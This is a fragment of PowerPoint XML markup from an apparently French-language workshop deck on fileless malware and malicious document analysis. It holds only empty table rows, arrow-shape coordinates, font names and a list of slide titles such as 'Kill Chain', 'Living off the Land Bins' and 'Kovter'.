                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="272654546"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="fr-FR"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2656580963"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="fr-FR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2300699035"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Right Arrow 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3014504" y="2538128"/>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ight Arrow 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3029898" y="2946230"/>
            <a:ext cx="436785" cy="108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ight Arrow 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3029898" y="3354330"/>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ight Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3034922" y="3691262"/>
            <a:ext cx="452179" cy="11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13225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Maldoc Analysis Workshop p.1</Template>
  <TotalTime>0</TotalTime>
  <Words>1704</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>383</Paragraphs>
  <Slides>29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Bodoni SvtyTwo ITC TT-Book</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Garamond</vt:lpstr>
      <vt:lpstr>Helvetica Light</vt:lpstr>
      <vt:lpstr>Open Sans</vt:lpstr>
      <vt:lpstr>Wingdings 2</vt:lpstr>
      <vt:lpstr>DividendVTI</vt:lpstr>
      <vt:lpstr>FILELESS MALWARE WORKSHOP </vt:lpstr>
      <vt:lpstr>FILELESS MALWARE </vt:lpstr>
      <vt:lpstr>MALDOC</vt:lpstr>
      <vt:lpstr>DEMO TIME</vt:lpstr>
      <vt:lpstr>KILL CHAIN</vt:lpstr>
      <vt:lpstr>RECAP</vt:lpstr>
      <vt:lpstr>RECAP</vt:lpstr>
      <vt:lpstr>RECAP</vt:lpstr>
      <vt:lpstr>RECAP</vt:lpstr>
      <vt:lpstr>RECAP</vt:lpstr>
      <vt:lpstr>RECAP</vt:lpstr>
      <vt:lpstr>RECAP</vt:lpstr>
      <vt:lpstr>RECAP 2</vt:lpstr>
      <vt:lpstr>RECAP 2</vt:lpstr>
      <vt:lpstr>RECAP 2</vt:lpstr>
      <vt:lpstr>RECAP 2</vt:lpstr>
      <vt:lpstr>RECAP 2</vt:lpstr>
      <vt:lpstr>THREAT CATEGORIES </vt:lpstr>
      <vt:lpstr>TTPs</vt:lpstr>
      <vt:lpstr>FILELESS PERSISTENCE </vt:lpstr>
      <vt:lpstr>MECHANISMES AV</vt:lpstr>
      <vt:lpstr>LIVING OFF THE LAND BINS</vt:lpstr>
      <vt:lpstr>EXAMPLE : CMD.EXE</vt:lpstr>
      <vt:lpstr>LIVING OFF THE LAND</vt:lpstr>
      <vt:lpstr>POWERLICKS</vt:lpstr>
      <vt:lpstr>KOVTER</vt:lpstr>
      <vt:lpstr>PHASE BOT</vt:lpstr>
      <vt:lpstr>AUGUST</vt:lpstr>
      <vt:lpstr>MAGNITUDE EK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2021-01-15T11:29:20Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-04-16T10:33:12Z</dcterms:modified>
</cp:coreProperties>
</file>